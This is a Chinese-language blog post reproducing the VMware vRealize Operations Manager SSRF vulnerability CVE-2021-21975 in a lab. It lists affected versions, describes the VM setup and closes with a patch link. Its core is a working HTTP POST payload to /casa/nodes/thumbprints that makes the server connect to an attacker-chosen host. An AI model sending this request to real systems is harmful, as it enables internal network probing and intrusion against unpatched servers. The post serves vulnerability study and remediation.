VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)复现

admin 2021年4月3日02:57:53评论138 views字数 531阅读1分46秒阅读模式

影响版本

VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0VMware Cloud Foundation  4.x、3.xvRealize Suite Lifecycle Manager 8.x


环境搭建

 

下载地址

https://my.vmware.com/group/vmware/patch#search

VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)复现

下载完之后双击。然后导入虚拟机

VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)复现

VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)复现

进行访问 https://192.168.1.100/

设置为新环境后即可

VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)复现

VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)复现


漏洞复现

 

构建数据包并发送

POST /casa/nodes/thumbprints HTTP/1.1Host: 192.168.1.100Content-Type: application/json;charset=UTF-8Content-Length: 22 ["192.168.1.103:6666"]

VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)复现


修复建议

 

官方已提供固件补丁包,可以访问以下连接下载

https://www.vmware.com/security/advisories/VMSA-2021-0004.html



本文始发于微信公众号(锋刃科技):VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日02:57:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VMware vRealize Operations Manager SSRF漏洞(CVE-2021-21975)复现https://cn-sec.com/archives/318586.html

发表评论

匿名网友 填写信息